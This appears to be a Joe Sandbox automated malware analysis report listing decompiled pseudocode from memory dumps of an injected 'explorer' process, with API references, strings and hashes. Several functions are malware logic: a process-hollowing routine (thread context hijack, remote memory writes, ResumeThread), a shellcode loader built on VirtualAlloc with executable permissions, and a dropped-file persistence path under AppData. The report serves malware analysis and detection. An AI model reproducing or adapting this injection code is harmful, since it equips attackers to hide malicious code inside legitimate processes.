:%d , xrefs: 0151291F, 01512938, 01512961
md != NULL, xrefs: 0151293E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: :%d $buf != NULL$crypto\digest\sha1.c$md != NULL$psAssert %s
API String ID: 3510742995-2343670412
Opcode ID: bf7c3fcdbccea56fb05537995837e8261ddb72b49d17973bfba920716cb2d261
Instruction ID: 0d967e102e61273bd30d0a34533ae6df88052e0f811adfb93558bab5c45c5aa0
Opcode Fuzzy Hash: bf7c3fcdbccea56fb05537995837e8261ddb72b49d17973bfba920716cb2d261
Instruction Fuzzy Hash: 6E11087260030A6BF7227E1AC8C0F5F77A8BB91668F10442DF9041E086ABB498864F50

Uniqueness

Uniqueness Score: 8.94%

Function 01513146, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01513146(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
				void _v68;
				void* _t8;
				void* _t14;
				void* _t15;
				void* _t18;
				char* _t21;
				char* _t25;
				char* _t28;
				void* _t30;

				_t21 = "crypto\\digest\\sha384.c";
				_t25 = "psAssert %s";
				_t28 = ":%d ";
				if(_a4 == 0) {
					_push(_t21);
					_push(_t25);
					_t18 = E01510CBC(_t8);
					_push(0x40);
					_push(_t28);
					E01510CBC(_t18);
					_t8 = E01510B84("md != NULL");
					_t30 = _t30 + 0x14;
				}
				if(_a8 == 0) {
					_push(_t21);
					_push(_t25);
					_t15 = E01510CBC(_t8);
					_push(0x41);
					_push(_t28);
					E01510CBC(_t15);
					E01510B84("out != NULL");
					_t30 = _t30 + 0x14;
				}
				_t9 = _a4;
				if( *((intOrPtr*)(_a4 + 0x48)) < 0x80) {
					E01512F1A(_t9,  &_v68);
					memcpy(_a8,  &_v68, 0x30);
					E01510BBB(0x40);
					_push(0x30);
				} else {
					_push(0xfffffffa);
				}
				_pop(_t14);
				return _t14;
			}

0x01513153
0x01513158
0x0151315d
0x01513162
0x01513164
0x01513165
0x01513166
0x0151316b
0x0151316d
0x0151316e
0x01513178
0x0151317d
0x0151317d
0x01513184
0x01513186
0x01513187
0x01513188
0x0151318d
0x0151318f
0x01513190
0x0151319a
0x0151319f
0x0151319f
0x015131a2
0x015131af
0x015131ba
0x015131c8
0x015131cf
0x015131d7
0x015131b1
0x015131b1
0x015131b1
0x015131d9
0x015131db

APIs

memcpy.MSVCRT(00000000,?,00000030,00000000,?), ref: 015131C8

Strings

psAssert %s, xrefs: 01513158, 01513165, 01513187
:%d , xrefs: 0151315D, 0151316D, 0151318F
crypto\digest\sha384.c, xrefs: 01513153, 01513164, 01513186
md != NULL, xrefs: 01513173
out != NULL, xrefs: 01513195

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: :%d $crypto\digest\sha384.c$md != NULL$out != NULL$psAssert %s
API String ID: 3510742995-4218004708
Opcode ID: 739311bd6a4ef31a91196238cbaaa601018930f92b17e78dbc7ca664b9cf5088
Instruction ID: 9f42570c06a00583fdc80c9f464c36abdbf0ca61e65eb36d0ce8042371cf5ae4
Opcode Fuzzy Hash: 739311bd6a4ef31a91196238cbaaa601018930f92b17e78dbc7ca664b9cf5088
Instruction Fuzzy Hash: 4801287254031A76FA127714CCC2FAF726CBBA15A9F104029FA043D0C6E6B44D8685B6

Uniqueness

Uniqueness Score: 10.55%

Function 015042EC, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E015042EC(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				char _v112;
				struct _CONTEXT _v828;
				char _t91;
				signed int _t95;
				void* _t102;
				intOrPtr _t106;
				signed int _t124;
				void* _t130;
				int _t131;
				signed int* _t133;
				intOrPtr* _t150;
				intOrPtr* _t151;
				void* _t154;
				void* _t158;
				void* _t159;
				void* _t160;

				_t131 = 0;
				_t150 = _a4;
				_v20 = 0;
				_v44 = 0;
				_v12 = 0;
				if( *_t150 == 0x5a4d) {
					_t154 =  *((intOrPtr*)(_t150 + 0x3c)) + _t150;
					E01513BA0(__ecx,  &_v112, 0, 0x44);
					E01513BA0(__ecx,  &_v36, 0, 0x10);
					E01513BA0(__ecx,  &_v828, 0, 0x2cc);
					_v16 =  *((intOrPtr*)(_t154 + 0x50));
					_t91 = E01513960(__ecx,  *((intOrPtr*)(_t154 + 0x50)));
					_t159 = _t158 + 0x28;
					_v12 = _t91;
					if(_t91 != 0) {
						_a4 = _t91;
						_v40 =  *((intOrPtr*)(_t150 + 0x3c)) + _t150 + 0xf8;
						E01513AC0( *((intOrPtr*)(_t150 + 0x3c)) + _t150 + 0xf8, _t91, _t150,  *(_t154 + 0x54));
						_t138 =  *(_t154 + 0x54);
						_t160 = _t159 + 0xc;
						_t95 = _t138;
						if(_t138 %  *(_t154 + 0x38) != 0) {
							_t95 = (_t95 /  *(_t154 + 0x38) + 1) *  *(_t154 + 0x38);
							_t131 = 0;
						}
						_a4 = _a4 + _t95;
						_v8 = _t131;
						if(0 >=  *(_t154 + 6)) {
							L12:
							_push( &_v36);
							_push( &_v112);
							_push(_t131);
							_push(_t131);
							_push(4);
							_push(_t131);
							_push(_t131);
							_push(_t131);
							_push(_a8);
							_v112 = 0x44;
							_push(_t131);
							if( *0x153aa2c() == 0) {
								_push(0xfffffff6);
								L27:
								_pop(1);
								if(_v36 != _t131) {
									TerminateProcess(_v36, _t131);
								}
								L29:
								E01513990( &_v12, _t131);
								_t102 = 1;
								L30:
								return _t102;
							}
							_v828.ContextFlags = 0x10007;
							if(GetThreadContext(_v32,  &_v828) != 0) {
								_push( &_v44);
								_push(0x40);
								_push(_v16);
								_t151 = _t154 + 0x34;
								_t106 =  *_t151;
								_push(_t106);
								_push(_v36);
								_a4 = _t106;
								if( *0x153a9f4() != 0) {
									_push( &_v20);
									_push(_v16);
									_push(_v12);
									_push(_a4);
									_push(_v36);
									if( *0x153aa5c() != 0) {
										_push( &_v20);
										_push(4);
										_push(_t151);
										_push(_v828.Ebx + 8);
										_push(_v36);
										if( *0x153aa5c() != 0) {
											_v828.Eax =  *((intOrPtr*)(_t154 + 0x28)) +  *_t151;
											if(SetThreadContext(_v32,  &_v828) != 0) {
												if(ResumeThread(_v32) != 0xffffffff) {
													goto L29;
												}
												_push(0xfffffff7);
												goto L27;
											}
											_push(0xfffffff8);
											goto L27;
										}
										_push(0xfffffff9);
										goto L27;
									}
									_push(0xfffffffa);
									goto L27;
								}
								_push(0xfffffffb);
								goto L27;
							}
							_push(0xfffffffc);
							goto L27;
						} else {
							_t133 = _v40 + 8;
							do {
								E01513AC0(_t138, _a4, _t133[3] + _t150, _t133[2]);
								_t138 =  *_t133;
								_t160 = _t160 + 0xc;
								_t124 = _t138;
								if(_t138 %  *(_t154 + 0x38) != 0) {
									_t138 =  *(_t154 + 0x38);
									_t124 = (_t124 /  *(_t154 + 0x38) + 1) *  *(_t154 + 0x38);
								}
								_a4 = _a4 + _t124;
								_v8 = _v8 + 1;
								_t133 =  &(_t133[0xa]);
							} while (_v8 < ( *(_t154 + 6) & 0x0000ffff));
							_t131 = 0;
							goto L12;
						}
					}
					_t102 = 0xfffffffd;
					goto L30;
				}
				_t130 = 0xfffffffe;
				return _t130;
			}

0x015042f6
0x015042f9
0x01504301
0x01504304
0x01504307
0x0150430d
0x01504322
0x01504324
0x01504330
0x01504342
0x0150434b
0x0150434e
0x01504353
0x01504356
0x0150435b
0x01504374
0x01504377
0x0150437a
0x0150437f
0x01504389
0x0150438c
0x01504390
0x0150439a
0x0150439d
0x0150439d
0x0150439f
0x015043a4
0x015043ab
0x015043f5
0x015043f8
0x015043fc
0x015043fd
0x015043fe
0x015043ff
0x01504401
0x01504402
0x01504403
0x01504404
0x01504407
0x0150440e
0x01504417
0x015044df
0x015044e1
0x015044e1
0x015044e5
0x015044eb
0x015044eb
0x015044f1
0x015044f6
0x015044fd
0x015044ff
0x00000000
0x015044ff
0x01504427
0x01504439
0x01504445
0x01504446
0x01504448
0x0150444b
0x0150444e
0x01504450
0x01504451
0x01504454
0x0150445f
0x01504468
0x01504469
0x0150446c
0x0150446f
0x01504472
0x0150447d
0x01504486
0x0150448d
0x0150448f
0x01504493
0x01504494
0x0150449f
0x015044aa
0x015044c2
0x015044d4
0x00000000
0x015044dc
0x015044d6
0x00000000
0x015044d6
0x015044c4
0x00000000
0x015044c4
0x015044a1
0x00000000
0x015044a1
0x0150447f
0x00000000
0x0150447f
0x01504461
0x00000000
0x01504461
0x0150443b
0x00000000
0x015043ad
0x015043b0
0x015043b3
0x015043bf
0x015043c4
0x015043cd
0x015043d0
0x015043d4
0x015043d6
0x015043de
0x015043de
0x015043e1
0x015043e8
0x015043eb
0x015043ee
0x015043f3
0x00000000
0x015043f3
0x015043ab
0x0150435f
0x00000000
0x0150435f
0x01504311
0x00000000

Strings

D, xrefs: 01504407

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: bb3322e21a73e531df51f5c75d05dce5abb1c9fc225ddc7ea092054e74667730
Instruction ID: 37615ca85a8fdf4c5191800fcd27ff921c2279b4c41cea9949d2d8a77888c936
Opcode Fuzzy Hash: bb3322e21a73e531df51f5c75d05dce5abb1c9fc225ddc7ea092054e74667730
Instruction Fuzzy Hash: 7F618371A0021AAFDF12CF99CC84EEEB7BDFF48224F118529F625EA5D0E73499548B50

Uniqueness

Uniqueness Score: 4.31%

Function 003FDB50, Relevance: 8.9, APIs: 7, Instructions: 145
memoryUNIQUE

Download Yara Rule

C-Code - Quality: 29%

			E003FDB50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _t54;
				void* _t58;
				long _t59;
				long _t76;
				intOrPtr _t78;

				_v12 = 0;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				while(0 != 0) {
				}
				__eflags =  *0x40f764 - 5;
				if( *0x40f764 != 5) {
					L9:
					_v20 = VirtualAlloc(0, 0x52, 0x3000, 0x40);
					__eflags = _v20;
					if(_v20 != 0) {
						_v8 = VirtualAlloc(0, 0x149, 0x3000, 0x40);
						__eflags = _v8;
						if(_v8 != 0) {
							memcpy(_v20,  &E0040F2B8, 0x52);
							memcpy(_v8,  &E0040F310, 0x129);
							_t54 = _v8 + 0x129;
							__eflags = _t54;
							_v16 = _t54;
							 *_v16 = _a4;
							 *((intOrPtr*)(_v16 + 8)) = _a8;
							 *((intOrPtr*)(_v16 + 0x10)) = _a12;
							 *(_v16 + 0x18) = 0;
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t58 = _v20(_v8, _v16);
							__eflags = _t58;
							if(_t58 != 0) {
								_t59 = _v16;
								__eflags =  *((intOrPtr*)(_t59 + 0x18));
								if( *((intOrPtr*)(_t59 + 0x18)) != 0) {
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									L30:
									__eflags = _v8;
									if(_v8 == 0) {
										L43:
										__eflags = _v20;
										if(_v20 != 0) {
											VirtualFree(_v20, 0, 0x4000);
										}
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										return _v12;
									} else {
										goto L31;
									}
									while(1) {
										L31:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_t76 = _v16;
									__eflags =  *((intOrPtr*)(_t76 + 0x18));
									if( *((intOrPtr*)(_t76 + 0x18)) == 0) {
										L42:
										VirtualFree(_v8, 0, 0x4000);
										goto L43;
									}
									_v24 = _v16;
									__eflags =  *((intOrPtr*)(_v24 + 0x1c));
									if(__eflags > 0) {
										goto L42;
									}
									if(__eflags < 0) {
										while(1) {
											L37:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										CloseHandle( *(_v16 + 0x18));
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												goto L42;
											}
										}
										goto L42;
									}
									_t78 = _v24;
									__eflags =  *((intOrPtr*)(_t78 + 0x18)) - 0xffffffff;
									if( *((intOrPtr*)(_t78 + 0x18)) >= 0xffffffff) {
										goto L42;
									}
									goto L37;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v12 = 0xfffffffb;
								goto L30;
							} else {
								goto L21;
							}
							while(1) {
								L21:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v12 = 0xfffffffc;
							goto L30;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v12 = 0xfffffffd;
						goto L30;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v12 = 0xfffffffe;
					goto L30;
				}
				__eflags =  *0x40f768 - 2;
				if( *0x40f768 != 2) {
					goto L9;
				}
				 *0x411a68(5);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_v12 = 0xffffffff;
				goto L30;
			}

0x003fdb56
0x003fdb5d
0x003fdb64
0x003fdb6b
0x003fdb72
0x003fdb76
0x003fdb78
0x003fdb7f
0x003fdba4
0x003fdbb5
0x003fdbb8
0x003fdbbc
0x003fdbe4
0x003fdbe7
0x003fdbeb
0x003fdc0a
0x003fdc20
0x003fdc2b
0x003fdc2b
0x003fdc30
0x003fdc39
0x003fdc41
0x003fdc4a
0x003fdc50
0x003fdc57
0x003fdc57
0x003fdc59
0x00000000
0x00000000
0x003fdc5b
0x003fdc65
0x003fdc68
0x003fdc6a
0x003fdc7b
0x003fdc7e
0x003fdc82
0x003fdc93
0x003fdc93
0x003fdc95
0x00000000
0x00000000
0x003fdc97
0x003fdc99
0x003fdc99
0x003fdc9d
0x003fdcf2
0x003fdcf2
0x003fdcf6
0x003fdd03
0x003fdd03
0x003fdd09
0x003fdd09
0x003fdd0b
0x00000000
0x00000000
0x003fdd0d
0x003fdd15
0x00000000
0x00000000
0x00000000
0x003fdc9f
0x003fdc9f
0x003fdc9f
0x003fdca1
0x00000000
0x00000000
0x003fdca3
0x003fdca5
0x003fdca8
0x003fdcac
0x003fdce1
0x003fdcec
0x00000000
0x003fdcec
0x003fdcb1
0x003fdcb7
0x003fdcbb
0x00000000
0x00000000
0x003fdcbd
0x003fdcc8
0x003fdcc8
0x003fdcc8
0x003fdcca
0x00000000
0x00000000
0x003fdccc
0x003fdcd5
0x003fdcdb
0x003fdcdb
0x003fdcdd
0x00000000
0x00000000
0x003fdcdf
0x00000000
0x003fdcdb
0x003fdcbf
0x003fdcc2
0x003fdcc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003fdc84
0x003fdc84
0x003fdc84
0x003fdc86
0x00000000
0x00000000
0x003fdc88
0x003fdc8a
0x00000000
0x00000000
0x00000000
0x00000000
0x003fdc6c
0x003fdc6c
0x003fdc6c
0x003fdc6e
0x00000000
0x00000000
0x003fdc70
0x003fdc72
0x00000000
0x00000000
0x00000000
0x00000000
0x003fdbed
0x003fdbed
0x003fdbed
0x003fdbef
0x00000000
0x00000000
0x003fdbf1
0x003fdbf3
0x00000000
0x00000000
0x00000000
0x00000000
0x003fdbbe
0x003fdbbe
0x003fdbbe
0x003fdbc0
0x00000000
0x00000000
0x003fdbc2
0x003fdbc4
0x00000000
0x003fdbc4
0x003fdb81
0x003fdb88
0x00000000
0x00000000
0x003fdb8c
0x003fdb92
0x003fdb92
0x003fdb94
0x00000000
0x00000000
0x003fdb96
0x003fdb98
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,00000052,00003000,00000040), ref: 003FDBAF
VirtualAlloc.KERNEL32(00000000,00000149,00003000,00000040), ref: 003FDBDE
memcpy.MSVCRT(00000000,0040F2B8,00000052), ref: 003FDC0A
memcpy.MSVCRT(00000000,0040F310,00000129), ref: 003FDC20
CloseHandle.KERNEL32(?), ref: 003FDCD5
VirtualFree.KERNEL32(00000000,00000000,00004000), ref: 003FDCEC
VirtualFree.KERNEL32(00000000,00000000,00004000), ref: 003FDD03

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy$CloseHandle
String ID:
API String ID: 2515959895-0
Opcode ID: cb12c5ae40b18a19c2845fd5508eb22e04264d5b3d0dd84237a00fc2d86881f4
Instruction ID: b4d43ef9fffdadf72ce3ec3646fe2b31aa23b32e91000a6a6af41a12b0135474
Opcode Fuzzy Hash: cb12c5ae40b18a19c2845fd5508eb22e04264d5b3d0dd84237a00fc2d86881f4
Instruction Fuzzy Hash: 33518EB0A0020CEBDB15CFA4C94CB7EBB76BB44314F258269E7266B6D0C7B18E40DB45

Uniqueness

Uniqueness Score: 100.00%

Function 00401A20, Relevance: 8.9, APIs: 7, Instructions: 137
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401A20(WCHAR** _a4, WCHAR* _a8, WCHAR* _a12) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				WCHAR* _v32;
				signed int _v36;
				void* _t150;

				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_v16 =  *_a4;
				_v28 = lstrlenW( *_a4) + 1;
				_v8 = lstrlenW(_a8);
				_v20 = lstrlenW(_a12);
				while(1) {
					_v16 = StrStrW(_v16, _a8);
					if(_v16 == 0) {
						break;
					}
					_v12 = _v12 + 1;
					_v16 =  &(_v16[_v8]);
				}
				if(_v12 != 0) {
					if(_v20 > _v8) {
						_v24 = (_v20 - _v8) * _v12 + _v28;
						E003F3FC0(_a4, _a4, _v28 << 1, _v24 << 1);
						_t150 = _t150 + 0xc;
					}
					_v16 =  *_a4;
					while(1) {
						_v16 = StrStrW(_v16, _a8);
						if(_v16 == 0) {
							break;
						}
						E003F4080(_v16,  &(_v16[_v20]),  &(_v16[_v8]), lstrlenW( &(_v16[_v8])) << 1);
						E003F4040(_a12, _v16, _a12, _v20 << 1);
						_t150 = _t150 + 0x18;
						while(0 != 0) {
						}
						_v16 =  &(_v16[_v20]);
					}
					if(_v8 > _v20) {
						_v32 =  *_a4;
						_v36 = (_v8 - _v20) * _v12;
						E003F4120( *_a4,  &(_v32[lstrlenW( *_a4) - _v36]), 0, _v36 << 1);
					}
					return  *_a4;
				}
				return 0;
			}

0x00401a26
0x00401a2d
0x00401a34
0x00401a3b
0x00401a42
0x00401a4e
0x00401a60
0x00401a6d
0x00401a7a
0x00401a7d
0x00401a8b
0x00401a92
0x00000000
0x00000000
0x00401a9a
0x00401aa6
0x00401aa6
0x00401aaf
0x00401abe
0x00401acd
0x00401ae0
0x00401ae5
0x00401ae5
0x00401aed
0x00401af0
0x00401afe
0x00401b05
0x00000000
0x00000000
0x00401b2e
0x00401b44
0x00401b49
0x00401b4c
0x00401b50
0x00401b5b
0x00401b5b
0x00401b66
0x00401b6d
0x00401b7a
0x00401b9b
0x00401ba0
0x00000000
0x00401ba6
0x00000000

APIs

lstrlenW.KERNEL32(00000000), ref: 00401A57
lstrlenW.KERNEL32(00000000), ref: 00401A67
lstrlenW.KERNEL32(00000000), ref: 00401A74
StrStrW.SHLWAPI(00000000,00000000), ref: 00401A85
StrStrW.SHLWAPI(00000000,00000000), ref: 00401AF8
lstrlenW.KERNEL32 ref: 00401B11
lstrlenW.KERNEL32(00000000,00000000,?), ref: 00401B8B

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: df6626abc6660e88fe3423d8964cf3f301e15313c26a48516e8f7ea3de104eca
Instruction ID: 1049b26cfcc4f917e831d2b5d034a50f2ac9059ffd72b0531e1deb754b9d25e4
Opcode Fuzzy Hash: df6626abc6660e88fe3423d8964cf3f301e15313c26a48516e8f7ea3de104eca
Instruction Fuzzy Hash: 5D51D774E0020DEFCB04DF98D994AAEBBB5FF88304F108599E515AB390D739AA45CF94

Uniqueness

Uniqueness Score: 5.54%

Function 0150805D, Relevance: 8.9, APIs: 7, Instructions: 129
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150805D(struct _CRITICAL_SECTION* __eax, void* __ebx, void* __eflags, WCHAR* _a4) {
				signed int _v8;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __esi;
				char _t58;
				signed int _t59;
				intOrPtr _t60;
				signed int _t67;
				intOrPtr _t68;
				void* _t75;
				signed int _t76;
				WCHAR* _t85;
				intOrPtr* _t87;
				signed int _t88;
				struct _CRITICAL_SECTION* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t75 = __ebx;
				_t90 = __eax;
				E01507C83( *((intOrPtr*)(__ebx + 4)), 1);
				_t85 = _a4;
				_v20 = E01516C90(_t85);
				_t58 = E01516C90(_t85);
				_t93 = _t92 + 0x10;
				_v16 = _t58;
				_t59 = lstrlenW(_t85);
				_t76 = 0;
				if(_t59 != 0) {
					_v12 = _t85 + _t59 * 2 - 2;
					do {
						_v12 = _v12 - 2;
						 *((short*)(_v16 + _t76 * 2)) =  *_v12;
						_t76 = _t76 + 1;
					} while (_t76 < _t59);
				}
				_v8 = _v8 & 0;
				 *((short*)(_v16 + _t59 * 2)) = 0;
				while(1) {
					_t87 = _t91 + _v8 * 4 - 0x10;
					_t60 = E01507F31(_t75, _t90, _t75, _a4,  *_t87);
					_t93 = _t93 + 0x10;
					_v12 = _t60;
					if(_t60 == 0) {
						EnterCriticalSection(_t90);
						E01507FE1(_t90, _a4,  *_t87);
						 *((intOrPtr*)(_t90 + 0x61c))(_t90,  *((intOrPtr*)(_t75 + 4)), _a4,  *_t87, 0);
						_t93 = _t93 + 0x1c;
						LeaveCriticalSection(_t90);
					}
					if(_v12 != 1) {
						break;
					}
					_v8 = _v8 + 1;
					Sleep(0x64);
					if(_v8 < 2) {
						continue;
					} else {
						_t88 = 0;
						if( *((intOrPtr*)(_t90 + 0x644)) > 0) {
							do {
								_v8 = _v8 & 0x00000000;
								_t67 = E01516D40( *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x640)) + _t88 * 4)));
								_v8 = _t67;
								if(_t67 == 0) {
									goto L13;
								} else {
									_t68 = E01507F31(_t75, _t90, _t75, _a4, _t67);
									_t93 = _t93 + 0x10;
									_v12 = _t68;
									if(_t68 == 0) {
										EnterCriticalSection(_t90);
										E01507FE1(_t90, _a4, _v8);
										 *((intOrPtr*)(_t90 + 0x61c))(_t90,  *((intOrPtr*)(_t75 + 4)), _a4, _v8, 0);
										_t93 = _t93 + 0x1c;
										LeaveCriticalSection(_t90);
									}
									E01513990( &_v8, 0);
									if(_v12 == 1) {
										goto L13;
									}
								}
								goto L14;
								L13:
								_t88 = _t88 + 1;
								Sleep(0x64);
							} while (_t88 <  *((intOrPtr*)(_t90 + 0x644)));
						}
					}
					break;
				}
				L14:
				E01513990( &_v20, 0);
				E01513990( &_v16, 0);
				return _v12;
			}

0x0150805d
0x0150806a
0x0150806c
0x01508071
0x0150807b
0x0150807e
0x01508083
0x01508087
0x0150808a
0x01508090
0x01508094
0x0150809a
0x0150809d
0x015080a6
0x015080aa
0x015080ae
0x015080af
0x0150809d
0x015080b8
0x015080bb
0x015080bf
0x015080c2
0x015080cd
0x015080d2
0x015080d5
0x015080da
0x015080dd
0x015080e8
0x015080f8
0x015080fe
0x01508102
0x01508102
0x0150810c
0x00000000
0x00000000
0x01508112
0x01508117
0x01508121
0x00000000
0x01508123
0x01508123
0x0150812b
0x01508131
0x01508137
0x0150813e
0x01508144
0x01508149
0x00000000
0x0150814b
0x01508151
0x01508156
0x01508159
0x0150815e
0x01508161
0x0150816d
0x0150817e
0x01508184
0x01508188
0x01508188
0x01508194
0x0150819f
0x00000000
0x00000000
0x0150819f
0x00000000
0x015081a1
0x015081a3
0x015081a4
0x015081aa
0x01508131
0x0150812b
0x00000000
0x01508121
0x015081b6
0x015081bc
0x015081c7
0x015081d5

APIs

Part of subcall function 01516C90: lstrlenW.KERNEL32(0151F679,0151F679,?), ref: 01516C9A

lstrlenW.KERNEL32(?), ref: 0150808A
EnterCriticalSection.KERNEL32 ref: 015080DD
LeaveCriticalSection.KERNEL32 ref: 01508102
Sleep.KERNEL32(00000064), ref: 01508117
EnterCriticalSection.KERNEL32 ref: 01508161
LeaveCriticalSection.KERNEL32 ref: 01508188
Sleep.KERNEL32(00000064), ref: 015081A4

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: 438fded3ca73f3ae355ff47a1bca1477dcf577b7b62ffc2d648c8c510c61fbc0
Instruction ID: e17356aa23ca019b806337d536a96bce31ea7a1e0fc94db7b2dc0ff406408e80
Opcode Fuzzy Hash: 438fded3ca73f3ae355ff47a1bca1477dcf577b7b62ffc2d648c8c510c61fbc0
Instruction Fuzzy Hash: 5441CD32D0020AFBDF22AFE4CC45A9EBBB6FF94300F144058E515AE181E731A661DB94

Uniqueness

Uniqueness Score: 4.31%

Function 015045A5, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101
stringUNIQUE

Download Yara Rule

C-Code - Quality: 81%

			E015045A5(void* __edi, void* __fp0, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v40;
				char _v168;
				char _v272;
				char _v2772;
				char _t29;
				intOrPtr* _t31;
				intOrPtr* _t32;
				intOrPtr* _t46;
				intOrPtr* _t51;
				void* _t56;
				intOrPtr _t64;

				_v16 = 0;
				_v12 = 0;
				_t29 = E01518580(__fp0,  *0x1538eac,  *0x153abcc,  &_v16, 3, 0, 0);
				_v8 = _t29;
				if(_t29 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t31 = _v8;
					_v20 = 0;
					while(1) {
						_t32 = E01513DD0(_t31,  &_v40);
						_pop(_t56);
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						_v12 = _v12 + 1;
						_t31 = _t32 + 0x14;
						__eflags = _t31;
						if(_t31 != 0) {
							continue;
						}
						break;
					}
					E01513D60(_t56,  &_v168, "jkfkdm", 0x80);
					lstrcatA( &_v168, "3");
					E01515480(E0151C990( &_v168, lstrlenA( &_v168), 0),  &_v2772);
					_t18 = E01516AF0(__eflags,  &_v272, 3, 0x64,  &_v2772) - 0x14; // -20
					_t64 = _t18 * _v12 + _v16;
					_t46 = E01513A40( &_v2772,  &_v8, _v16, _t64);
					__eflags = _t46;
					if(_t46 != 0) {
						E0151C820( &_v8,  &_v40,  &_v272);
						_t51 = _a4;
						__eflags = _t51;
						if(_t51 != 0) {
							 *_t51 = _t64;
						}
						_t46 = _v8;
					}
					return _t46;
				}
				return 0;
			}

0x015045bf
0x015045c8
0x015045cb
0x015045d3
0x015045d8
0x015045ea
0x015045eb
0x015045ec
0x015045ed
0x015045ee
0x015045ef
0x015045f2
0x015045f6
0x015045fb
0x01504601
0x01504602
0x01504604
0x00000000
0x00000000
0x01504606
0x01504609
0x01504609
0x0150460c
0x00000000
0x00000000
0x00000000
0x0150460c
0x01504620
0x01504634
0x0150465d
0x01504679
0x01504680
0x0150468b
0x01504693
0x01504695
0x015046a6
0x015046ab
0x015046b1
0x015046b3
0x015046b5
0x015046b5
0x015046b7
0x015046b7
0x00000000
0x015046ba
0x00000000

APIs

Part of subcall function 01518580: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 0151860B

lstrcatA.KERNEL32(?,0152A3E4,?,?,C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe), ref: 01504634
lstrlenA.KERNEL32(?,00000000,?,?,C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe), ref: 01504642

Strings

jkfkdm, xrefs: 0150461A
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 0150460E
AAAA, xrefs: 015045E2

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FindResourcelstrcatlstrlen
String ID: AAAA$C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$jkfkdm
API String ID: 4208741436-4235365251
Opcode ID: 6ee9ba11fcc8dccdd3bdd938b4077f1c3f9a9ab4f7d6bf45543c7100e311457b
